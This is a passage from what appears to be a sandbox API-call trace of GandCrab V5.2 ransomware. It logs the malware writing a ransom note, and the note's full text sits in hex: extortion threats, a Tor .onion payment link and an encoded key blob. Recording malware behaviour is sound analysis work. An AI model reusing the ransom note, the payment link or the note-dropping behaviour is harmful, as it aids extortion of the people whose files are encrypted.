(in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0092.770] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.770] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0092.770] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.770] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0092.770] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.770] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.770] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\\\TITWMVJL-DECRYPT.txt") returned 63 [0092.771] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\ssxpzkkuqdeph\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0092.771] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0092.771] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, 